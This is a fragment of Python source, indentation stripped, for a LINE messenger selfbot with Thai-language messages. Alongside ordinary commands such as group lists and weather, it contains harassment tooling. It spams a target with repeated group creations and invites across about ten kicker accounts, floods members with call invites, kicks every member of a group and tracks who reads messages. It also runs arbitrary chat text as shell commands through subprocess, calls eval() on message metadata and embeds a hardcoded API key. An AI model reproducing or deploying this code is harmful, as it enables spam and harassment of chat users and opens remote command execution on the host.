res = '╭───「 Group List 」'
res += '\n├ List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}GroupList'
res += '\n│ • {key}GroupList Leave <num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'grouplist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('leave '):
texts = textt[6:].split(', ')
leaved = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถออกลุ่มได้\nไม่พบชื่อกลุ่มนี้')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
continue
kicker.leaveGroup(group.id)
leaved.append(group.id)
if to not in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
else:
line.sendMessage(to, 'Failed leave group number %i, เลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
continue
kicker.leaveGroup(group.id)
leaved.append(group.id)
if to not in leaved:
line.sendMessage(to, 'ออกจากลุ่มเรียบร้อย %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in leaved:
continue
kicker.leaveGroup(gid)
kicker2.leaveGroup(gid)
kicker3.leaveGroup(gid)
kicker4.leaveGroup(gid)
kicker5.leaveGroup(gid)
kicker6.leaveGroup(gid)
kicker7.leaveGroup(gid)
kicker8.leaveGroup(gid)
kicker9.leaveGroup(gid)
kicker10.leaveGroup(gid)
leaved.append(gid)
#time.sleep(0.8)
if to not in leaved:
line.sendMessage(to, 'ออกทุกกลุ่มเรียบร้อย ♪')
else:
line.sendMessage(to, 'ไม่สามารถออกกลุ่มชื่อ `%s`นี้ได้\nไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('invitationlist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
gids = line.getGroupIdsInvited()
gnames = []
ress = []
res = '╭───「 Invitation List 」'
res += '\n├ List:'
if gids:
groups = line.getGroups(gids)
no = 0
if len(groups) > 200:
parsed_len = len(groups)//200+1
for point in range(parsed_len):
for group in groups[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for group in groups:
no += 1
res += '\n│ %i. %s//%i' % (no, group.name, len(group.members))
gnames.append(group.name)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}InvitationList'
res += '\n│ • {key}InvitationList Accept <num/name/all>'
res += '\n│ • {key}InvitationList Reject <num/name/all>'
res += '\n╰───「SelfBot ProtectV2.2」'
ress.append(res)
if cmd == 'invitationlist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('accept '):
texts = textt[7:].split(', ')
accepted = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้ากลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ เนื่องจากมายเลข %i นี้มากว่าคำเชิญที่คุณมี' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in accepted:
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
continue
line.acceptGroupInvitation(group.id)
accepted.append(group.id)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่ม %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in accepted:
continue
line.acceptGroupInvitation(gid)
accepted.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ทำการเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถเข้าร่วมกลุ่มได้ `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
elif texttl.startswith('reject '):
texts = textt[7:].split(', ')
rejected = []
if not gids:
return line.sendMessage(to, 'ไม่สามารถคำเชิญเข้าร่วมกลุ่มได้\nไม่มีคำเชิญเข้าร่วมกลุ่ม')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
if num <= len(groups) and num > 0:
group = groups[num - 1]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
else:
line.sendMessage(to, 'ไม่สามายกเลิกค้างเชิญหมายเลข %iนี้ได้เนื่องจากเลขเกิน!' % num)
elif name != None:
if name in gnames:
group = groups[gnames.index(name)]
if group.id in rejected:
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
continue
line.rejectGroupInvitation(group.id)
rejected.append(group.id)
line.sendMessage(to, 'ทำการยกเลิกค้างเชิญ %s' % group.name)
elif name.lower() == 'all':
for gid in gids:
if gid in rejected:
continue
line.rejectGroupInvitation(gid)
rejected.append(gid)
time.sleep(0.8)
line.sendMessage(to, 'ยกเลิกคำเชิญเข้าร่วมกลุ่มทั้งหมดแล้ว ♪')
else:
line.sendMessage(to, 'ไม่สามารถยกเลิกคำเชิญเข้าร่วมกลุ่มชื่อ`%s`นี้ได้เนื่องจากไม่พบชื่อกลุ่มนี้ ♪' % name)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd == 'memberlist':
if msg.toType == 1:
room = line.getRoom(to)
members = room.contacts
elif msg.toType == 2:
group = line.getGroup(to)
members = group.members
else:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
if not members:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนสมาชิกในกลุ่มได้\nไม่มีสมาชิกในกลุ่ม')
res = '╭───「 Member List 」'
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s' % (no, member.displayName)
if member == members[-1]:
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cmd == 'pendinglist':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
members = group.invitee
if not members:
return line.sendMessage(to, 'ไม่สามารถแสดงจำนวนค้างเชิญในกลุ่มได้\nไม่พบค้างเชิญ')
res = '╭───「 Pending List 」'
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
res += '\n│ %i. %s' % (no, member.displayName)
if member == members[-1]:
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cmd == 'openqr':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, 'เปิดลิ้งกลุ่มแล้ว')
elif "im " in msg.text.lower():
query = msg.text.replace("im ","")
r = requests.get("https://cryptic-ridge-9197.herokuapp.com/api/imagesearch/" + query + "?offset=1")
data=r.text
data=json.loads(r.text)
if data != []:
for food in data:
line.sendImageWithURL(msg.to, str(food["url"]))
elif msg.text.lower() == "/gift":
msg.contentType = 9
msg.contentMetadata={'PRDID': '','PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
elif "/gift " in msg.text.lower():
red = re.compile(re.escape('.gift '),re.IGNORECASE)
themeid = red.sub('',msg.text)
msg.contentType = 9
msg.contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'}
msg.text = None
line.sendMessage(msg.to,text = None,contentMetadata={'PRDID': themeid,'PRDTYPE': 'THEME','MSGTPL': '1'},contentType = 9)
elif msg.text.lower() == "weather:chiangmai":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1153670))),1)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1153670))),1)
elif msg.text.lower() == "weather:ubonratchathani":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1605245))),2)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1605245))),2)
elif msg.text.lower() == "weather:bangkok":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1609350))),3)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1609350))),3)
elif msg.text.lower() == "weather:phetchabun":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1607737))),4)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1607737))),4)
elif msg.text.lower() == "weather:khon kaen":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1609776))),5)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1609776))),5)
elif msg.text.lower() == "weather:ayutthaya":
if msg.toType != 0:
data_output(msg.to,data_organizer(data_fetch(url_builder(1607532))),6)
else:
data_output(msg.from_,data_organizer(data_fetch(url_builder(1607532))),6)
elif msg.text.lower() in ["weather"]:
if msg.toType != 0:
line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
else:
line.sendMessage(msg.to,"สภาพอากาศในแต่ละจังหวัด\n- chiangmai\n- ubonratchathani\n- bangkok\n- phetchabun\n-khon kaen\n-ayutthaya\nพิมพ์ \"weather:[ชื่อจังหวัด]\" เพื่อดูข้อมูลสภาพอากาศ")
#-----------------------------------------------------------
elif msg.text.lower().startswith(".recall"):
if msg.toType == 2:
reps = int(msg.text.split(" ")[1])
asup = [g1.adityasplittext(msg.text,'s').replace('{} '.format(reps),'')]*reps
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
nama = [key1]
g1.sendMessage(to,"กำลังดำเนินการ...")
babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup] ; g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
else:
g1.sendMessage(to,"กำลังดำเนินการ...")
group = g1.getGroup(to);nama = [contact.mid for contact in group.members]; babu = [g1.call.inviteIntoGroupCall(to,nama,mediaType=2) for babu in asup] ; g1.sendMessage(to,"เชิญคอลสำเร็จแล้ว!")
else:
g1.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
elif cmd.startswith("spaminv "):
aa = cmd.replace("spaminv ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker.groups
try:
kicker.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker.createGroup(name, [target])
for i in grup:
group = kicker.getGroup(i)
if group.name == name:
kicker.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv2 "):
aa = cmd.replace("spaminv2 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker2.groups
try:
kicker2.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker2.createGroup(name, [target])
for i in grup:
group = kicker2.getGroup(i)
if group.name == name:
kicker2.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker2.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv3 "):
aa = cmd.replace("spaminv3 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker3.groups
try:
kicker3.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker3.createGroup(name, [target])
for i in grup:
group = kicker3.getGroup(i)
if group.name == name:
kicker3.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker3.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv4 "):
aa = cmd.replace("spaminv4 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker4.groups
try:
kicker4.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker4.createGroup(name, [target])
for i in grup:
group = kicker4.getGroup(i)
if group.name == name:
kicker4.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker4.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv5 "):
aa = cmd.replace("spaminv5 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker5.groups
try:
kicker5.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker5.createGroup(name, [target])
for i in grup:
group = kicker5.getGroup(i)
if group.name == name:
kicker5.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker5.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv6 "):
aa = cmd.replace("spaminv6 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker6.groups
try:
kicker6.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker6.createGroup(name, [target])
for i in grup:
group = kicker6.getGroup(i)
if group.name == name:
kicker6.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker6.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv7 "):
aa = cmd.replace("spaminv7 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker8.createGroup(name, [target])
for i in grup:
group = kicker8.getGroup(i)
if group.name == name:
kicker8.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv8 "):
aa = cmd.replace("spaminv8 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker9.groups
try:
kicker9.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker9.createGroup(name, [target])
for i in grup:
group = kicker9.getGroup(i)
if group.name == name:
kicker9.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker9.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv9 "):
aa = cmd.replace("spaminv9 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker10.groups
try:
kicker10.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker10.createGroup(name, [target])
for i in grup:
group = kicker10.getGroup(i)
if group.name == name:
kicker10.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker10.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv10 "):
aa = cmd.replace("spaminv10 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = g1.groups
try:
g1.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
g1.createGroup(name, [target])
for i in grup:
group = g1.getGroup(i)
if group.name == name:
g1.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(g1.getContact(target).displayName, name, count))
elif cmd.startswith("spaminv11 "):
aa = cmd.replace("spaminv11 ","")
bb = aa.split("-")
count = int(bb[0])
name = str(bb[1])
target = bb[2]
grup = kicker7.groups
try:
kicker7.findAndAddContactsByMid(target)
except:
pass
for anu in range(count):
kicker7.createGroup(name, [target])
for i in grup:
group = kicker7.getGroup(i)
if group.name == name:
kicker7.inviteIntoGroup(group.id, [target])
print("Inviting to group %s"%anu)
print("Sukses mank")
line.sendMessage(msg.to, "Success invite %s\nGroup : %s\nCount : %s"%(kicker7.getContact(target).displayName, name, count))
elif cmd.startswith("lifftest"):
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
r = requests.get("https://www.googleapis.com/youtube/v3/search?part=snippet&maxResults=10&q={}&type=video&key=AIzaSyAF-_5PLCt8DwhYc7LBskesUnsm1gFHSP8".format(str(search)))
data = r.text
a = json.loads(data)
if a["items"] != []:
ret_ = []
yt = []
for music in a["items"]:
ret_.append({"thumbnailImageUrl": 'https://i.ytimg.com/vi/{}/maxresdefault.jpg'.format(music['id']['videoId']),"imageSize": "contain","imageAspectRatio": "square","title": '{}'.format(str(music['snippet']['title'][:40])),"text": '{}'.format(str(music['snippet']['channelTitle'][:15])),"actions": [{"type": "uri","label": "Go Page","uri": 'https://www.youtube.com/watch?v=' +music['id']['videoId']}]})
yt.append('https://www.youtube.com/watch?v=' +music['id']['videoId'])
k = len(ret_)//10
for aa in range(k+1):
data = {"type": "template","altText": "Youtube","template": {"type": "carousel","columns": ret_[aa*10 : (aa+1)*10]}}
sendflex(to, data)
elif ".s " in msg.text.lower():
spl = re.split(".s ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
try:
line.sendMessage(to,subprocess.getoutput(spl[1]))
except:
pass
elif cmd == 'closeqr':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปิดลิ้งกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
group.preventedJoinByTicket = True
line.updateGroup(group)
line.sendMessage(to, 'ปิดลิ้งกลุ่มแล้ว')
elif cmd.startswith('changegroupname '):
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
gname = removeCmd(text, setKey)
if len(gname) > 50:
return line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อกลุ่มได้\nชื่อกลุ่มต้องไม่เกิน 50')
group.name = gname
line.updateGroup(group)
line.sendMessage(to, 'เปลี่ยนชื่อกลุ่มเป็น `%s`' % gname)
elif cmd == 'changegrouppict':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเปลี่ยนรุปกลุ่มได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
if to not in settings['changeGroupPicture']:
settings['changeGroupPicture'].append(to)
line.sendMessage(to, 'กรุณาส่งภาพ, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
else:
line.sendMessage(to, 'คำสั่งนี้ถูกงานอยู่แล้ว, กรุณาส่งภาพ หรือ พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif cmd == 'kickall':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
if not group.members:
return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้\nไม่มีคนไห้เตะ')
for member in group.members:
if member.mid == myMid:
continue
try:
line.kickoutFromGroup(to, [member.mid])
except TalkException as talk_error:
return line.sendMessage(to, 'ไม่สามารถเตะสมาชิกทั้งหมดได้เนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
line.sendMessage(to, 'เตะสมาชิกทั้งหมด, จำนวน %i คน' % len(group.members))
elif cmd == 'cancelall':
if msg.toType != 2: return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
group = line.getGroup(to)
if not group.invitee:
return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้\nไม่มีสมาชิกค้างเชิญ')
for member in group.invitee:
if member.mid == myMid:
continue
try:
line.cancelGroupInvitation(to, [member.mid])
except TalkException as talk_error:
return line.sendMessage(to, 'ไม่สามารถยกเลิกค้างเชิญได้เนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
line.sendMessage(to, 'ยกเลิกค้างเชิญทั้งหมดแล้ว\nจำนวน %i คน' % len(group.invitee))
elif cmd.startswith('lurk'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if msg.toType in [1, 2] and to not in lurking:
lurking[to] = {
'status': False,
'time': None,
'members': [],
'reply': {
'status': False,
'message': settings['defaultReplyReader']
}
}
res = '╭───「 Lurking 」'
if msg.toType in [1, 2]: res += '\n├ Status : ' + bool_dict[lurking[to]['status']][1]
if msg.toType in [1, 2]: res += '\n├ Reply Reader : ' + bool_dict[lurking[to]['reply']['status']][1]
if msg.toType in [1, 2]: res += '\n├ Reply Reader Message : ' + lurking[to]['reply']['message']
res += '\n├ Usage : '
res += '\n│ • {key}Lurk'
res += '\n│ • {key}Lurk <on/off>'
res += '\n│ • {key}Lurk Result'
res += '\n│ • {key}Lurk Reset'
res += '\n│ • {key}Lurk ReplyReader <on/off>'
res += '\n│ • {key}Lurk ReplyReader <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'lurk':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif msg.toType not in [1, 2]:
return line.sendMessage(to, 'ไม่สามารถใช้คำสั่งนี้ได้\nคำสั่งนี้ใช้ได้ในกลุ่มเท่านั้น')
elif texttl == 'on':
if lurking[to]['status']:
line.sendMessage(to, 'เปิดโหมดตรวจจับคนอ่าน')
else:
lurking[to].update({
'status': True,
'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
'members': []
})
line.sendMessage(to, 'เปิดแล้ว')
elif texttl == 'off':
if not lurking[to]['status']:
line.sendMessage(to, 'ปิดโหมดตรวจจับคนอ่าน')
else:
lurking[to].update({
'status': False,
'time': None,
'members': []
})
line.sendMessage(to, 'ปิดแล้ว')
elif texttl == 'result':
if not lurking[to]['status']:
line.sendMessage(to, 'รีเช็ตคนอ่านเรียบร้อย')
else:
if not lurking[to]['members']:
line.sendMessage(to, 'ไม่สามารถรีเช็ตคนอ่านได้\nเนื่องจากไม่พบคนอ่าน')
else:
members = lurking[to]['members']
res = '╭───「 Lurking 」'
if msg.toType == 2: res += '\n├ Group Name : ' + line.getGroup(to).name
parsed_len = len(members)//200+1
no = 0
for point in range(parsed_len):
for member in members[point*200:(point+1)*200]:
no += 1
try:
name = line.getContact(member).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if member == members[-1]:
res += '\n│'
res += '\n├ Time Set : ' + lurking[to]['time']
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif texttl == 'reset':
if not lurking[to]['status']:
line.sendMessage(to, 'ไม่สามารถรีเช็ตคนอ่านได้\nยังไม่ได้เปิดโหมดตรวจจับคนอ่าน')
else:
lurking[to].update({
'status': True,
'time': datetime.now(tz=pytz.timezone('Asia/Jakarta')).strftime('%Y-%m-%d %H:%M:%S'),
'members': []
})
line.sendMessage(to, 'รีเช็ตเรียบร้อย')
elif texttl.startswith('replyreader '):
texts = textt[12:]
if texts == 'on':
if lurking[to]['reply']['status']:
line.sendMessage(to, 'ข้อความทักคนอ่านเปิดใช้งานอยู่แล้ว')
else:
lurking[to]['reply']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนอ่าน')
elif texts == 'off':
if not lurking[to]['reply']['status']:
line.sendMessage(to, 'ข้อความทักคนอ่านถุกปิดใช้งานอยู่แล้ว')
else:
lurking[to]['reply']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนอ่าน')
else:
lurking[to]['reply']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนอ่านเป็น `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('greet'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Greet Message 」'
res += '\n├ Greetings Join Status : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├ Greetings Join Message : ' + settings['greet']['join']['message']
res += '\n├ Greetings Leave Status : ' + bool_dict[settings['greet']['leave']['status']][0]
res += '\n├ Greetings Join Message : ' + settings['greet']['leave']['message']
res += '\n├ Usage : '
res += '\n│ • {key}Greet'
res += '\n│ • {key}Greet Join <on/off>'
res += '\n│ • {key}Greet Join <message>'
res += '\n│ • {key}Greet Leave <on/off>'
res += '\n│ • {key}Greet Leave <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'greet':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('join '):
texts = textt[5:]
textsl = texts.lower()
if textsl == 'on':
if settings['greet']['join']['status']:
line.sendMessage(to, 'ข้อความทักคนเข้ากลุ่มถูกเปิดใช้งานอยู่แล้ว')
else:
settings['greet']['join']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนเข้ากลุ่ม')
elif textsl == 'off':
if not settings['greet']['join']['status']:
line.sendMessage(to, 'ข้อความทักคนเข้ากลุ่มถูกปิดใช้งานอยู่แล้ว')
else:
settings['greet']['join']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนเข้ากลุ่ม')
else:
settings['greet']['join']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนเข้ากลุ่มเป็น `%s`' % texts)
elif texttl.startswith('leave '):
texts = textt[6:]
textsl = texts.lower()
if textsl == 'on':
if settings['greet']['leave']['status']:
line.sendMessage(to, 'ข้อความทักคนออกกลุ่มถุกเปิดใช้งานอยู่แล้ว')
else:
settings['greet']['leave']['status'] = True
line.sendMessage(to, 'เปิดข้อความทักคนออกกลุ่ม')
elif textsl == 'off':
if not settings['greet']['leave']['status']:
line.sendMessage(to, 'ข้อความทักคนออกกลุ่มถูกปิดใช้งานอยู่แล้ว')
else:
settings['greet']['leave']['status'] = False
line.sendMessage(to, 'ปิดข้อความทักคนออกกลุ่ม')
else:
settings['greet']['leave']['message'] = texts
line.sendMessage(to, 'เปลี่ยนข้อความทักคนออกกลุ่มเป็น `%s`' % texts)
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('kick '):
if msg.toType != 2: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้เฉพาะในกลุ่มเท่านั้น')
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid == myMid:
continue
try:
kicker5.kickoutFromGroup(to, [mid])
except TalkException as talk_error:
return kicker5.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nเนื่องจาก `%s`' % talk_error.reason)
time.sleep(0.8)
kicker5.sendMessage(to, 'เตะสมาชิกเรียบร้อย\nจำนวน %i คน' % len(mentions['MENTIONEES']))
else:
kicker5.sendMessage(to, 'ไม่สามารถเตะสมาชิกได้\nกรุณาแท็กคนที่จะเตะ')
elif cmd.startswith('vkick '):
if msg.toType != 2: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้เฉพาะในกลุ่มเท่านั้น')
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
